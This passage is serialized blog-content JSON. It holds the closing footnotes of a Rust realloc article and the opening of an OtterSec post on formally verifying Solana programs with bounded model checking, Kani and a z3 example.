internals!",{"type":25,"tag":19431,"props":22370,"children":22371},{},[22372],{"type":25,"tag":162,"props":22373,"children":22377},{"href":22374,"ariaDescribedBy":22375,"dataFootnoteRef":7,"id":22376},"#user-content-fn-slice-unbound-lifetime",[19438],"user-content-fnref-slice-unbound-lifetime",[22378],{"type":31,"value":22379},"6",{"type":25,"tag":22381,"props":22382,"children":22385},"section",{"className":22383,"dataFootnotes":7},[22384],"footnotes",[22386,22393],{"type":25,"tag":26,"props":22387,"children":22390},{"className":22388,"id":19438},[22389],"sr-only",[22391],{"type":31,"value":22392},"Footnotes",{"type":25,"tag":6711,"props":22394,"children":22395},{},[22396,22501,22519,22574,22587,22615],{"type":25,"tag":2043,"props":22397,"children":22399},{"id":22398},"user-content-fn-rc-refs",[22400,22402,22408,22410,22415,22417,22421,22423,22427,22429,22434,22436,22442,22444,22449,22451,22461,22463,22468,22470,22475,22477,22482,22484,22490,22492],{"type":31,"value":22401},"I find it helpful to view owning an ",{"type":25,"tag":82,"props":22403,"children":22405},{"className":22404},[],[22406],{"type":31,"value":22407},"Rc\u003CT>",{"type":31,"value":22409}," as holding a shared reference to the underlying ",{"type":25,"tag":82,"props":22411,"children":22413},{"className":22412},[],[22414],{"type":31,"value":177},{"type":31,"value":22416}," (stored in the magical land of I-don't-need-to-care-about-this-object-not-living-long-enough known as the heap). Owning the ",{"type":25,"tag":64,"props":22418,"children":22419},{},[22420],{"type":31,"value":20416},{"type":31,"value":22422}," ensures that the actual ",{"type":25,"tag":64,"props":22424,"children":22425},{},[22426],{"type":31,"value":7669},{"type":31,"value":22428}," stays alive, however all you have is a reference to the ",{"type":25,"tag":82,"props":22430,"children":22432},{"className":22431},[],[22433],{"type":31,"value":177},{"type":31,"value":22435}," (through the ",{"type":25,"tag":82,"props":22437,"children":22439},{"className":22438},[],[22440],{"type":31,"value":22441},"Deref\u003CTarget = T>",{"type":31,"value":22443}," impl) - ",{"type":25,"tag":64,"props":22445,"children":22446},{},[22447],{"type":31,"value":22448},"not",{"type":31,"value":22450}," ownership ",{"type":25,"tag":64,"props":22452,"children":22453},{},[22454,22456],{"type":31,"value":22455},"of the ",{"type":25,"tag":82,"props":22457,"children":22459},{"className":22458},[],[22460],{"type":31,"value":177},{"type":31,"value":22462},". In short, owning an ",{"type":25,"tag":82,"props":22464,"children":22466},{"className":22465},[],[22467],{"type":31,"value":22407},{"type":31,"value":22469}," is owning a (shared, read-only) reference to ",{"type":25,"tag":82,"props":22471,"children":22473},{"className":22472},[],[22474],{"type":31,"value":177},{"type":31,"value":22476},", not owning ",{"type":25,"tag":82,"props":22478,"children":22480},{"className":22479},[],[22481],{"type":31,"value":177},{"type":31,"value":22483}," directly like with ",{"type":25,"tag":82,"props":22485,"children":22487},{"className":22486},[],[22488],{"type":31,"value":22489},"Box\u003CT>",{"type":31,"value":22491},". ",{"type":25,"tag":162,"props":22493,"children":22498},{"href":22494,"ariaLabel":22495,"className":22496,"dataFootnoteBackref":7},"#user-content-fnref-rc-refs","Back to reference 1",[22497],"data-footnote-backref",[22499],{"type":31,"value":22500},"↩",{"type":25,"tag":2043,"props":22502,"children":22504},{"id":22503},"user-content-fn-sendsync",[22505,22511,22512],{"type":25,"tag":82,"props":22506,"children":22508},{"className":22507},[],[22509],{"type":31,"value":22510},"!Send + !Sync",{"type":31,"value":10409},{"type":25,"tag":162,"props":22513,"children":22517},{"href":22514,"ariaLabel":22515,"className":22516,"dataFootnoteBackref":7},"#user-content-fnref-sendsync","Back to reference 2",[22497],[22518],{"type":31,"value":22500},{"type":25,"tag":2043,"props":22520,"children":22522},{"id":22521},"user-content-fn-layout",[22523,22525,22530,22531,22544,22546,22551,22553,22558,22560,22565,22567],{"type":31,"value":22524},"Note that this is a terrible idea for yet another reason: ",{"type":25,"tag":82,"props":22526,"children":22528},{"className":22527},[],[22529],{"type":31,"value":18896},{"type":31,"value":1680},{"type":25,"tag":162,"props":22532,"children":22535},{"href":22533,"rel":22534},"https://docs.rs/solana-program/1.10.30/src/solana_program/account_info.rs.html#15-33",[166],[22536,22538],{"type":31,"value":22537},"not declared with ",{"type":25,"tag":82,"props":22539,"children":22541},{"className":22540},[],[22542],{"type":31,"value":22543},"#[repr(C)]",{"type":31,"value":22545},", meaning that, once again, we're dealing with no layout guarantees. But thanks to the power of blockchain, fixing this ABI interface ",{"type":25,"tag":64,"props":22547,"children":22548},{},[22549],{"type":31,"value":22550},"breaks the entire chain",{"type":31,"value":22552}," since old contracts will no longer work. So, we're stuck with cobbling together ",{"type":25,"tag":64,"props":22554,"children":22555},{},[22556],{"type":31,"value":22557},"some",{"type":31,"value":22559}," kind of interface to the specific layout of the specific ",{"type":25,"tag":82,"props":22561,"children":22563},{"className":22562},[],[22564],{"type":31,"value":20468},{"type":31,"value":22566}," versions used to build on-chain code for all eternity... ",{"type":25,"tag":162,"props":22568,"children":22572},{"href":22569,"ariaLabel":22570,"className":22571,"dataFootnoteBackref":7},"#user-content-fnref-layout","Back to reference 3",[22497],[22573],{"type":31,"value":22500},{"type":25,"tag":2043,"props":22575,"children":22577},{"id":22576},"user-content-fn-rustc-llvm",[22578,22580],{"type":31,"value":22579},"Actually, it's LLVM that does the optimization ",{"type":25,"tag":162,"props":22581,"children":22585},{"href":22582,"ariaLabel":22583,"className":22584,"dataFootnoteBackref":7},"#user-content-fnref-rustc-llvm","Back to reference 4",[22497],[22586],{"type":31,"value":22500},{"type":25,"tag":2043,"props":22588,"children":22590},{"id":22589},"user-content-fn-godbolt",[22591,22598,22600,22606,22608],{"type":25,"tag":162,"props":22592,"children":22595},{"href":22593,"rel":22594},"https://godbolt.org/z/PK46xMbxc",[166],[22596],{"type":31,"value":22597},"Click here",{"type":31,"value":22599}," for a Compiler Explorer link showing this - note that the code for both implementations is almost identical. And yes, it's x86_64 and not eBPF, but unfortunately Compiler Explorer doesn't have Rust ",{"type":25,"tag":82,"props":22601,"children":22603},{"className":22602},[],[22604],{"type":31,"value":22605},"libcore",{"type":31,"value":22607}," available for other architectures yet. ",{"type":25,"tag":162,"props":22609,"children":22613},{"href":22610,"ariaLabel":22611,"className":22612,"dataFootnoteBackref":7},"#user-content-fnref-godbolt","Back to reference 5",[22497],[22614],{"type":31,"value":22500},{"type":25,"tag":2043,"props":22616,"children":22618},{"id":22617},"user-content-fn-slice-unbound-lifetime",[22619,22621,22626,22628,22634,22636,22642,22644,22650,22652,22658,22660,22666,22668,22673,22675],{"type":31,"value":22620},"The astute reader may have noticed that ",{"type":25,"tag":82,"props":22622,"children":22624},{"className":22623},[],[22625],{"type":31,"value":22313},{"type":31,"value":22627}," still returns an unbounded lifetime (notice in the signature ",{"type":25,"tag":82,"props":22629,"children":22631},{"className":22630},[],[22632],{"type":31,"value":22633},"unsafe fn from_raw_parts_mut\u003C'a, T>(data: *mut T, len: usize) -> &'a mut [T]",{"type":31,"value":22635},", the lifetime parameter ",{"type":25,"tag":82,"props":22637,"children":22639},{"className":22638},[],[22640],{"type":31,"value":22641},"'a",{"type":31,"value":22643}," does not appear in the arguments). However, we immediately constrain the lifetime by assigning it to ",{"type":25,"tag":82,"props":22645,"children":22647},{"className":22646},[],[22648],{"type":31,"value":22649},"*slice",{"type":31,"value":22651},", which is ",{"type":25,"tag":82,"props":22653,"children":22655},{"className":22654},[],[22656],{"type":31,"value":22657},"&'info [u8]",{"type":31,"value":22659}," (where ",{"type":25,"tag":82,"props":22661,"children":22663},{"className":22662},[],[22664],{"type":31,"value":22665},"'info",{"type":31,"value":22667}," is the lifetime parameter of the ",{"type":25,"tag":82,"props":22669,"children":22671},{"className":22670},[],[22672],{"type":31,"value":18896},{"type":31,"value":22674}," struct) - this is exactly the lifetime we started with. ",{"type":25,"tag":162,"props":22676,"children":22680},{"href":22677,"ariaLabel":22678,"className":22679,"dataFootnoteBackref":7},"#user-content-fnref-slice-unbound-lifetime","Back to reference 6",[22497],[22681],{"type":31,"value":22500},{"type":25,"tag":9316,"props":22683,"children":22684},{},[22685],{"type":31,"value":9320},{"title":7,"searchDepth":6769,"depth":6769,"links":22687},[22688,22694,22698,22699,22701],{"id":18325,"depth":6769,"text":22689,"children":22690},"Breaking down realloc",[22691,22692],{"id":18491,"depth":6778,"text":18494},{"id":19850,"depth":6778,"text":22693},"Back to realloc",{"id":20801,"depth":6769,"text":20804,"children":22695},[22696,22697],{"id":20807,"depth":6778,"text":20810},{"id":21029,"depth":6778,"text":21032},{"id":21215,"depth":6769,"text":21218},{"id":21617,"depth":6769,"text":22700},"Towards safer unsafe",{"id":19438,"depth":6769,"text":22392},"content:blog:2022-12-09-rust-realloc-and-references.md","blog/2022-12-09-rust-realloc-and-references.md","blog/2022-12-09-rust-realloc-and-references",{"_path":22706,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":22707,"description":22708,"author":22709,"image":22710,"date":22712,"isFeatured":16,"onBlogPage":16,"tags":22713,"body":22714,"_type":6798,"_id":32959,"_source":6800,"_file":32960,"_stem":32961,"_extension":6803},"/blog/2023-01-26-formally-verifying-solana-programs","Solana Formal Verification: A Case Study","We present a novel framework for formal verification of Solana Anchor programs — and a case study application to the Squads multisig.","harrison",{"src":22711,"height":17579,"width":17580},"/posts/formally-verifying-solana-programs/formal-verification-title.jpg","2023-01-26",[6815,6816],{"type":22,"children":22715,"toc":32931},[22716,22721,22726,22752,22756,22768,22791,22814,22826,22849,22852,22858,22908,22914,22920,22925,22936,22977,22982,22988,22993,23226,23245,23250,23255,23328,23333,23403,23417,23842,23862,23868,23887,23892,23897,23902,23908,23920,23955,23966,23977,23989,23994,24026,24050,24069,24075,24092,24098,24125,24130,24149,24161,24307,24335,24338,24350,24433,24452,24455,24494,24661,24666,24672,24684,24703,24716,24877,24889,24902,25376,25381,25428,25434,25452,25521,25746,25960,25965,26037,26085,26090,26096,26198,26302,26307,26370,26375,26381,26446,26451,26493,26519,26525,26594,26599,26649,26660,26666,26677,26698,26703,26708,26731,26737,26749,26769,27885,27904,27955,27960,27968,27980,27985,27993,27998,28014,28050,28055,28149,28154,28162,28167,28279,28284,28292,28305,28469,28474,28482,28487,28492,28560,28594,28600,28605,28616,28634,29012,29024,29036,29044,29055,29086,29091,29099,29104,29377,29396,29401,29427,30295,30307,30406,30418,30460,30465,30477,30485,30490,30502,30528,30688,30700,30708,30713,30989,30994,31006,31161,31181,31507,31541,31735,31768,31780,31902,31922,31927,31932,31937,31950,31958,31963,32438,32450,32455,32467,32472,32731,32757,32762,32768,32774,32786,32798,32817,32864,32869,32875,32880,32885,32890,32895,32900,32905,32908,32927],{"type":25,"tag":38,"props":22717,"children":22718},{},[22719],{"type":31,"value":22720},"Since the early days of computing, bugs have crept their way into programs and wreaked havoc on the intentions of the programmer. Logical fallacies, race conditions, or simple typos could manifest as crashes or lay undetected, silently breaking the functionality of the host program.",{"type":25,"tag":38,"props":22722,"children":22723},{},[22724],{"type":31,"value":22725},"When your program is connected to the internet, there is the new risk that bugs may introduce security holes into your system. Even simple buffer overflows can be exploited by skilled attackers to compromise the integrity of your program.",{"type":25,"tag":38,"props":22727,"children":22728},{},[22729,22731,22735,22737,22742,22744,22751],{"type":31,"value":22730},"In the world of Web3 we create programs that talk to strangers ",{"type":25,"tag":64,"props":22732,"children":22733},{},[22734],{"type":31,"value":20330},{"type":31,"value":22736}," control millions of dollars 🤑. Bugs in these programs are some of the ",{"type":25,"tag":64,"props":22738,"children":22739},{},[22740],{"type":31,"value":22741},"juciest",{"type":31,"value":22743},"; anonymous attackers that can find and exploit them will walk away with potentially ",{"type":25,"tag":162,"props":22745,"children":22748},{"href":22746,"rel":22747},"https://rekt.news/leaderboard/",[166],[22749],{"type":31,"value":22750},"hundreds of millions of dollars",{"type":31,"value":179},{"type":25,"tag":22753,"props":22754,"children":22755},"hr",{},[],{"type":25,"tag":38,"props":22757,"children":22758},{},[22759,22761,22766],{"type":31,"value":22760},"At OtterSec we are ",{"type":25,"tag":64,"props":22762,"children":22763},{},[22764],{"type":31,"value":22765},"highly skilled in pest control",{"type":31,"value":22767}," - finding and squashing bugs before they are exploited by less well-intentioned hackers. We are constantly striving to improve our techniques and develop new technologies that aid in our auditing processes.",{"type":25,"tag":38,"props":22769,"children":22770},{},[22771,22773,22780,22782,22789],{"type":31,"value":22772},"Recently we were contacted by the ",{"type":25,"tag":162,"props":22774,"children":22777},{"href":22775,"rel":22776},"https://squads.so/",[166],[22778],{"type":31,"value":22779},"Squads team",{"type":31,"value":22781}," to explore how formal verification could be used to verify security-critical properties of Solana programs. We were really excited about this opportunity and have been developing a prototype with the ",{"type":25,"tag":162,"props":22783,"children":22786},{"href":22784,"rel":22785},"https://github.com/Squads-Protocol/squads-mpl",[166],[22787],{"type":31,"value":22788},"Squads Multisig Program",{"type":31,"value":22790}," as our main case study.",{"type":25,"tag":38,"props":22792,"children":22793},{},[22794,22796,22803,22805,22812],{"type":31,"value":22795},"We now have a (mostly) working prototype that can be used to formally verify critical properties of Solana programs in order to ensure a higher level of security. Our tool integrates with ",{"type":25,"tag":162,"props":22797,"children":22800},{"href":22798,"rel":22799},"https://www.anchor-lang.com/",[166],[22801],{"type":31,"value":22802},"anchor-lang",{"type":31,"value":22804}," and provides new APIs to specify invariants for your Solana code. It then autogenerates proof harnesses which are verified with the ",{"type":25,"tag":162,"props":22806,"children":22809},{"href":22807,"rel":22808},"https://github.com/model-checking/kani",[166],[22810],{"type":31,"value":22811},"Kani Rust Verifier",{"type":31,"value":22813},". Additionally, we are implementing a formal-verification-friendly runtime SDK layer that accelerates the expensive process of running formal verification tools on complex code.",{"type":25,"tag":38,"props":22815,"children":22816},{},[22817,22819,22824],{"type":31,"value":22818},"In this blog post, we're excited to share our progress and the challenges we've encountered during the process. We will describe the main concepts behind ",{"type":25,"tag":64,"props":22820,"children":22821},{},[22822],{"type":31,"value":22823},"bounded model checking",{"type":31,"value":22825}," (our formal verification method of choice) and explain how we've applied these concepts to Solana.",{"type":25,"tag":38,"props":22827,"children":22828},{},[22829],{"type":25,"tag":64,"props":22830,"children":22831},{},[22832,22834,22841,22843],{"type":31,"value":22833},"If you're interested in learning more or getting your own programs formally verified, let us know! We'd be excited to chat with you! — Fill out ",{"type":25,"tag":162,"props":22835,"children":22838},{"href":22836,"rel":22837},"https://osec.io/contact",[166],[22839],{"type":31,"value":22840},"this form",{"type":31,"value":22842}," or email us at ",{"type":25,"tag":162,"props":22844,"children":22846},{"href":22845},"mailto:contact@osec.io",[22847],{"type":31,"value":22848},"contact@osec.io",{"type":25,"tag":22753,"props":22850,"children":22851},{},[],{"type":25,"tag":630,"props":22853,"children":22855},{"id":22854},"contents",[22856],{"type":31,"value":22857},"Contents:",{"type":25,"tag":6711,"props":22859,"children":22860},{},[22861,22866,22883,22893,22898,22903],{"type":25,"tag":2043,"props":22862,"children":22863},{},[22864],{"type":31,"value":22865},"Formal Verification with Bounded Model Checking\na. Overview\nb. A simple example\nc. Loop bounds & path explosion\nd. The Kani Rust Verifier",{"type":25,"tag":2043,"props":22867,"children":22868},{},[22869,22874,22876,22881],{"type":25,"tag":9273,"props":22870,"children":22871},{},[22872],{"type":31,"value":22873},"Specification",{"type":31,"value":22875},": How can we describe what we ",{"type":25,"tag":64,"props":22877,"children":22878},{},[22879],{"type":31,"value":22880},"want",{"type":31,"value":22882}," our program to do?",{"type":25,"tag":2043,"props":22884,"children":22885},{},[22886,22891],{"type":25,"tag":9273,"props":22887,"children":22888},{},[22889],{"type":31,"value":22890},"Verification",{"type":31,"value":22892},": How do we check that our model is correct?",{"type":25,"tag":2043,"props":22894,"children":22895},{},[22896],{"type":31,"value":22897},"Case Study: Squads Multisig",{"type":25,"tag":2043,"props":22899,"children":22900},{},[22901],{"type":31,"value":22902},"Additional challenges in Solana",{"type":25,"tag":2043,"props":22904,"children":22905},{},[22906],{"type":31,"value":22907},"Conclusion",{"type":25,"tag":26,"props":22909,"children":22911},{"id":22910},"formal-verification-with-bounded-model-checking",[22912],{"type":31,"value":22913},"Formal Verification with Bounded Model Checking",{"type":25,"tag":606,"props":22915,"children":22917},{"id":22916},"overview",[22918],{"type":31,"value":22919},"Overview",{"type":25,"tag":38,"props":22921,"children":22922},{},[22923],{"type":31,"value":22924},"Formal verification is the process of using a formal specification to verify the correctness of a system. In this case, the systems we are verifying are programs written in Rust that run on the Solana blockchain.",{"type":25,"tag":38,"props":22926,"children":22927},{},[22928,22930,22935],{"type":31,"value":22929},"There are many different flavors of formal verification, however in this research we are using ",{"type":25,"tag":9273,"props":22931,"children":22932},{},[22933],{"type":31,"value":22934},"bounded model checking (BMC)",{"type":31,"value":179},{"type":25,"tag":38,"props":22937,"children":22938},{},[22939,22941,22946,22948,22953,22955,22959,22961,22967,22969,22975],{"type":31,"value":22940},"In short, the idea of BMC is to execute our program ",{"type":25,"tag":64,"props":22942,"children":22943},{},[22944],{"type":31,"value":22945},"symbolically",{"type":31,"value":22947}," rather than ",{"type":25,"tag":64,"props":22949,"children":22950},{},[22951],{"type":31,"value":22952},"concretely",{"type":31,"value":22954},". Instead of actually performing an ",{"type":25,"tag":64,"props":22956,"children":22957},{},[22958],{"type":31,"value":13594},{"type":31,"value":22960}," when we see the line ",{"type":25,"tag":82,"props":22962,"children":22964},{"className":22963},[],[22965],{"type":31,"value":22966},"int x = a + b",{"type":31,"value":22968},", we store the symbolic expression ",{"type":25,"tag":82,"props":22970,"children":22972},{"className":22971},[],[22973],{"type":31,"value":22974},"x == a + b",{"type":31,"value":22976},". We do this for every line and once we reach the end of the program we have compiled a huge list of symbolic expressions. At this point, we can feed these expressions to a SMT solver along with a correctness property P in order to check if our program satisfies this property.",{"type":25,"tag":38,"props":22978,"children":22979},{},[22980],{"type":31,"value":22981},"If we hit a branch as we are tracing the program, we will take both sides of the branch adding the positive branch condition as a constraint to one side and the negative condition to the other side.",{"type":25,"tag":606,"props":22983,"children":22985},{"id":22984},"a-simple-example",[22986],{"type":31,"value":22987},"A simple example",{"type":25,"tag":38,"props":22989,"children":22990},{},[22991],{"type":31,"value":22992},"As an example, consider the following function:",{"type":25,"tag":206,"props":22994,"children":22996},{"code":22995,"language":2254,"meta":7,"className":20473,"style":7},"int foo(int x) {\n    int y = x + 3;\n    int z;\n    if (y > 100) {\n        z = y * 2;\n    } else {\n        z = y + 1;\n    }\n\n    // Property P:\n    assert(z != 105);\n}\n",[22997],{"type":25,"tag":82,"props":22998,"children":22999},{"__ignoreMap":7},[23000,23030,23064,23076,23101,23129,23144,23171,23178,23185,23193,23219],{"type":25,"tag":216,"props":23001,"children":23002},{"class":6922,"line":6923},[23003,23008,23013,23017,23021,23026],{"type":25,"tag":216,"props":23004,"children":23005},{"style":6936},[23006],{"type":31,"value":23007},"int",{"type":25,"tag":216,"props":23009,"children":23010},{"style":7047},[23011],{"type":31,"value":23012}," foo",{"type":25,"tag":216,"props":23014,"children":23015},{"style":6964},[23016],{"type":31,"value":1850},{"type":25,"tag":216,"props":23018,"children":23019},{"style":6936},[23020],{"type":31,"value":23007},{"type":25,"tag":216,"props":23022,"children":23023},{"style":6947},[23024],{"type":31,"value":23025}," x",{"type":25,"tag":216,"props":23027,"children":23028},{"style":6964},[23029],{"type":31,"value":18761},{"type":25,"tag":216,"props":23031,"children":23032},{"class":6922,"line":6769},[23033,23038,23042,23046,23051,23055,23060],{"type":25,"tag":216,"props":23034,"children":23035},{"style":6936},[23036],{"type":31,"value":23037},"    int",{"type":25,"tag":216,"props":23039,"children":23040},{"style":6964},[23041],{"type":31,"value":8462},{"type":25,"tag":216,"props":23043,"children":23044},{"style":6953},[23045],{"type":31,"value":266},{"type":25,"tag":216,"props":23047,"children":23048},{"style":6964},[23049],{"type":31,"value":23050}," x ",{"type":25,"tag":216,"props":23052,"children":23053},{"style":6953},[23054],{"type":31,"value":3539},{"type":25,"tag":216,"props":23056,"children":23057},{"style":6989},[23058],{"type":31,"value":23059}," 3",{"type":25,"tag":216,"props":23061,"children":23062},{"style":6964},[23063],{"type":31,"value":6967},{"type":25,"tag":216,"props":23065,"children":23066},{"class":6922,"line":6778},[23067,23071],{"type":25,"tag":216,"props":23068,"children":23069},{"style":6936},[23070],{"type":31,"value":23037},{"type":25,"tag":216,"props":23072,"children":23073},{"style":6964},[23074],{"type":31,"value":23075}," z;\n",{"type":25,"tag":216,"props":23077,"children":23078},{"class":6922,"line":7005},[23079,23083,23088,23092,23097],{"type":25,"tag":216,"props":23080,"children":23081},{"style":6973},[23082],{"type":31,"value":16235},{"type":25,"tag":216,"props":23084,"children":23085},{"style":6964},[23086],{"type":31,"value":23087}," (y ",{"type":25,"tag":216,"props":23089,"children":23090},{"style":6953},[23091],{"type":31,"value":5902},{"type":25,"tag":216,"props":23093,"children":23094},{"style":6989},[23095],{"type":31,"value":23096}," 100",{"type":25,"tag":216,"props":23098,"children":23099},{"style":6964},[23100],{"type":31,"value":18761},{"type":25,"tag":216,"props":23102,"children":23103},{"class":6922,"line":7110},[23104,23109,23113,23117,23121,23125],{"type":25,"tag":216,"props":23105,"children":23106},{"style":6964},[23107],{"type":31,"value":23108},"        z ",{"type":25,"tag":216,"props":23110,"children":23111},{"style":6953},[23112],{"type":31,"value":266},{"type":25,"tag":216,"props":23114,"children":23115},{"style":6964},[23116],{"type":31,"value":8462},{"type":25,"tag":216,"props":23118,"children":23119},{"style":6953},[23120],{"type":31,"value":8519},{"type":25,"tag":216,"props":23122,"children":23123},{"style":6989},[23124],{"type":31,"value":11886},{"type":25,"tag":216,"props":23126,"children":23127},{"style":6964},[23128],{"type":31,"value":6967},{"type":25,"tag":216,"props":23130,"children":23131},{"class":6922,"line":7216},[23132,23136,23140],{"type":25,"tag":216,"props":23133,"children":23134},{"style":6964},[23135],{"type":31,"value":19737},{"type":25,"tag":216,"props":23137,"children":23138},{"style":6973},[23139],{"type":31,"value":7268},{"type":25,"tag":216,"props":23141,"children":23142},{"style":6964},[23143],{"type":31,"value":7241},{"type":25,"tag":216,"props":23145,"children":23146},{"class":6922,"line":7244},[23147,23151,23155,23159,23163,23167],{"type":25,"tag":216,"props":23148,"children":23149},{"style":6964},[23150],{"type":31,"value":23108},{"type":25,"tag":216,"props":23152,"children":23153},{"style":6953},[23154],{"type":31,"value":266},{"type":25,"tag":216,"props":23156,"children":23157},{"style":6964},[23158],{"type":31,"value":8462},{"type":25,"tag":216,"props":23160,"children":23161},{"style":6953},[23162],{"type":31,"value":3539},{"type":25,"tag":216,"props":23164,"children":23165},{"style":6989},[23166],{"type":31,"value":8471},{"type":25,"tag":216,"props":23168,"children":23169},{"style":6964},[23170],{"type":31,"value":6967},{"type":25,"tag":216,"props":23172,"children":23173},{"class":6922,"line":7257},[23174],{"type":25,"tag":216,"props":23175,"children":23176},{"style":6964},[23177],{"type":31,"value":7311},{"type":25,"tag":216,"props":23179,"children":23180},{"class":6922,"line":7275},[23181],{"type":25,"tag":216,"props":23182,"children":23183},{"emptyLinePlaceholder":16},[23184],{"type":31,"value":7642},{"type":25,"tag":216,"props":23186,"children":23187},{"class":6922,"line":7296},[23188],{"type":25,"tag":216,"props":23189,"children":23190},{"style":6927},[23191],{"type":31,"value":23192},"    // Property P:\n",{"type":25,"tag":216,"props":23194,"children":23195},{"class":6922,"line":7305},[23196,23201,23206,23210,23215],{"type":25,"tag":216,"props":23197,"children":23198},{"style":7047},[23199],{"type":31,"value":23200},"    assert",{"type":25,"tag":216,"props":23202,"children":23203},{"style":6964},[23204],{"type":31,"value":23205},"(z ",{"type":25,"tag":216,"props":23207,"children":23208},{"style":6953},[23209],{"type":31,"value":19646},{"type":25,"tag":216,"props":23211,"children":23212},{"style":6989},[23213],{"type":31,"value":23214}," 105",{"type":25,"tag":216,"props":23216,"children":23217},{"style":6964},[23218],{"type":31,"value":7797},{"type":25,"tag":216,"props":23220,"children":23221},{"class":6922,"line":7557},[23222],{"type":25,"tag":216,"props":23223,"children":23224},{"style":6964},[23225],{"type":31,"value":7874},{"type":25,"tag":38,"props":23227,"children":23228},{},[23229,23231,23236,23238,23244],{"type":31,"value":23230},"This function takes an input ",{"type":25,"tag":82,"props":23232,"children":23234},{"className":23233},[],[23235],{"type":31,"value":2541},{"type":31,"value":23237}," and does some computation. At the end of the program, the property we want to verify is that ",{"type":25,"tag":82,"props":23239,"children":23241},{"className":23240},[],[23242],{"type":31,"value":23243},"z != 105",{"type":31,"value":179},{"type":25,"tag":38,"props":23246,"children":23247},{},[23248],{"type":31,"value":23249},"With BMC, we could trace this program and derive the following constraints:",{"type":25,"tag":38,"props":23251,"children":23252},{},[23253],{"type":31,"value":23254},"Positive branch:",{"type":25,"tag":206,"props":23256,"children":23258},{"code":23257,"language":2254,"meta":7,"className":20473,"style":7},"y == x + 3\ny > 100\nz == y * 2\n",[23259],{"type":25,"tag":82,"props":23260,"children":23261},{"__ignoreMap":7},[23262,23287,23303],{"type":25,"tag":216,"props":23263,"children":23264},{"class":6922,"line":6923},[23265,23270,23274,23278,23282],{"type":25,"tag":216,"props":23266,"children":23267},{"style":6964},[23268],{"type":31,"value":23269},"y ",{"type":25,"tag":216,"props":23271,"children":23272},{"style":6953},[23273],{"type":31,"value":12528},{"type":25,"tag":216,"props":23275,"children":23276},{"style":6964},[23277],{"type":31,"value":23050},{"type":25,"tag":216,"props":23279,"children":23280},{"style":6953},[23281],{"type":31,"value":3539},{"type":25,"tag":216,"props":23283,"children":23284},{"style":6989},[23285],{"type":31,"value":23286}," 3\n",{"type":25,"tag":216,"props":23288,"children":23289},{"class":6922,"line":6769},[23290,23294,23298],{"type":25,"tag":216,"props":23291,"children":23292},{"style":6964},[23293],{"type":31,"value":23269},{"type":25,"tag":216,"props":23295,"children":23296},{"style":6953},[23297],{"type":31,"value":5902},{"type":25,"tag":216,"props":23299,"children":23300},{"style":6989},[23301],{"type":31,"value":23302}," 100\n",{"type":25,"tag":216,"props":23304,"children":23305},{"class":6922,"line":6778},[23306,23311,23315,23319,23323],{"type":25,"tag":216,"props":23307,"children":23308},{"style":6964},[23309],{"type":31,"value":23310},"z ",{"type":25,"tag":216,"props":23312,"children":23313},{"style":6953},[23314],{"type":31,"value":12528},{"type":25,"tag":216,"props":23316,"children":23317},{"style":6964},[23318],{"type":31,"value":8462},{"type":25,"tag":216,"props":23320,"children":23321},{"style":6953},[23322],{"type":31,"value":8519},{"type":25,"tag":216,"props":23324,"children":23325},{"style":6989},[23326],{"type":31,"value":23327}," 2\n",{"type":25,"tag":38,"props":23329,"children":23330},{},[23331],{"type":31,"value":23332},"Negative branch:",{"type":25,"tag":206,"props":23334,"children":23336},{"code":23335,"language":2254,"meta":7,"className":20473,"style":7},"y == x + 3\ny \u003C= 100\nz == y + 1\n",[23337],{"type":25,"tag":82,"props":23338,"children":23339},{"__ignoreMap":7},[23340,23363,23379],{"type":25,"tag":216,"props":23341,"children":23342},{"class":6922,"line":6923},[23343,23347,23351,23355,23359],{"type":25,"tag":216,"props":23344,"children":23345},{"style":6964},[23346],{"type":31,"value":23269},{"type":25,"tag":216,"props":23348,"children":23349},{"style":6953},[23350],{"type":31,"value":12528},{"type":25,"tag":216,"props":23352,"children":23353},{"style":6964},[23354],{"type":31,"value":23050},{"type":25,"tag":216,"props":23356,"children":23357},{"style":6953},[23358],{"type":31,"value":3539},{"type":25,"tag":216,"props":23360,"children":23361},{"style":6989},[23362],{"type":31,"value":23286},{"type":25,"tag":216,"props":23364,"children":23365},{"class":6922,"line":6769},[23366,23370,23375],{"type":25,"tag":216,"props":23367,"children":23368},{"style":6964},[23369],{"type":31,"value":23269},{"type":25,"tag":216,"props":23371,"children":23372},{"style":6953},[23373],{"type":31,"value":23374},"\u003C=",{"type":25,"tag":216,"props":23376,"children":23377},{"style":6989},[23378],{"type":31,"value":23302},{"type":25,"tag":216,"props":23380,"children":23381},{"class":6922,"line":6778},[23382,23386,23390,23394,23398],{"type":25,"tag":216,"props":23383,"children":23384},{"style":6964},[23385],{"type":31,"value":23310},{"type":25,"tag":216,"props":23387,"children":23388},{"style":6953},[23389],{"type":31,"value":12528},{"type":25,"tag":216,"props":23391,"children":23392},{"style":6964},[23393],{"type":31,"value":8462},{"type":25,"tag":216,"props":23395,"children":23396},{"style":6953},[23397],{"type":31,"value":3539},{"type":25,"tag":216,"props":23399,"children":23400},{"style":6989},[23401],{"type":31,"value":23402}," 1\n",{"type":25,"tag":38,"props":23404,"children":23405},{},[23406,23408,23415],{"type":31,"value":23407},"Using the ",{"type":25,"tag":162,"props":23409,"children":23412},{"href":23410,"rel":23411},"https://github.com/Z3Prover/z3",[166],[23413],{"type":31,"value":23414},"z3",{"type":31,"value":23416}," SMT solver, we could check both of these cases like so:",{"type":25,"tag":206,"props":23418,"children":23422},{"code":23419,"language":23420,"meta":7,"className":23421,"style":7},"from z3 import *\n\nx = Int('x')\ny = Int('y')\nz = Int('z')\n\n# Positive branch:\ns = Solver()\ns.add(y == x + 3)\ns.add(y > 100)\ns.add(z == y * 2)\n\n# check if we can violate the correctness property\ns.add(Not(z != 105))\nprint(s.check()) # \"unsat\"\n\n# Negative branch:\ns = Solver()\ns.add(y == x + 3)\ns.add(y \u003C= 100)\ns.add(z == y + 1)\n\n# check if we can violate the correctness property\ns.add(Not(z != 105))\nprint(s.check()) # \"unsat\"\n","python","language-python shiki shiki-themes 